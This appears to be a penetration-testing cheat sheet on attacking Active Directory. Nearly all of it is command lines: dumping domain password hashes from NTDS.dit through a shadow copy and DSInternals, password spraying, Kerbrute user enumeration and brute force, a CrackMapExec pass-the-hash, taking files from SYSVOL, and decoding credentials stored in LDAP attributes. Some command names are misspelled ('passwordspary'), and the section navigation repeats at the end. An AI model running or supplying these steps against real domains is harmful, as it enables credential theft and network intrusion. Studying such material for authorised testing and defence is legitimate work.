🔧Testing Active Directory

Tools

Load DSInternals using Powershell

Set-ExecutionPolicy Unrestricted

Install-Module -Name DSInternals

Install Impacket in Linux

sudo apt install python3-impacket

Install BloodHound in Linux

sudo apt install bloodhound

pip install bloodhound

Install Kerbrute

Install Crackmapexec

sudo apt install crackmapexec

Extract the AD hashes

reg SAVE HKLM\SYSTEM c:\temp\sys

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

ESENTUTL /p c:\temp\dit /!1024 /8 /o

$key=Get-BootKey -SystemHiveFilePath c:\temp\sys

Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit

Password spraying Active Directory

Import-Module c:\tools\DomainPasswordSpary.ps1

Invoke-DomainPasswordSpary -Password kitty-kat

Invoke-DomainPasswordSpary -PasswordList c:\tools\adpass.txt

Kerberos brute-forcing attacks

Kerbrute

Username Enumeration

./kerbrute userenum -d cybex.com --dc <domain IP> <username list>

Password Attack

./kerbrute passwordspary -d cybex.com --dc <domain IP> <password-list> <password>

CrackMapExec to access and enumerate AD

crackmapexec smb <ip/cidr>

Pass The Hash Attack

crackmapexec smb <domain IP> -u "<username>" -H "<password hash>"

crackmapexec smb <domain IP> -u "username" -p <password.txt>

smbclient \\\\<Domain IP address>\\sysvol -U <username>

Retrieve a File

smb> get <file name or file location>

Take advantage of legacy data

Jxplorer

Open Jxplorer
Enter username and password
Select a user
Select Table Editor Column at the right hand side
Decode the Info value (base64 encoded)

Decode Base64 value

echo "<base64 encoded text>" | base64 -d

PreviousIntroduction to Identities NextAdvanced Penetration Testing

Last updated 1 year ago

Was this helpful?

Tools

Load DSInternals using Powershell

Install Impacket in Linux

Install BloodHound in Linux

Install Kerbrute

Install Crackmapexec

Extract the AD hashes

Password spraying Active Directory

Kerberos brute-forcing attacks

Kerbrute

Username Enumeration

Password Attack

CrackMapExec to access and enumerate AD

Pass The Hash Attack

Investigate the SYSVOL share

Retrieve a File

Take advantage of legacy data

Jxplorer

Decode Base64 value

Tools

Load DSInternals using Powershell

Install Impacket in Linux

Install BloodHound in Linux

Install Kerbrute

Install Crackmapexec

Extract the AD hashes

Password spraying Active Directory

Kerberos brute-forcing attacks

Kerbrute

Username Enumeration

Password Attack

CrackMapExec to access and enumerate AD

Pass The Hash Attack

Investigate the SYSVOL share

Retrieve a File

Take advantage of legacy data

Jxplorer

Decode Base64 value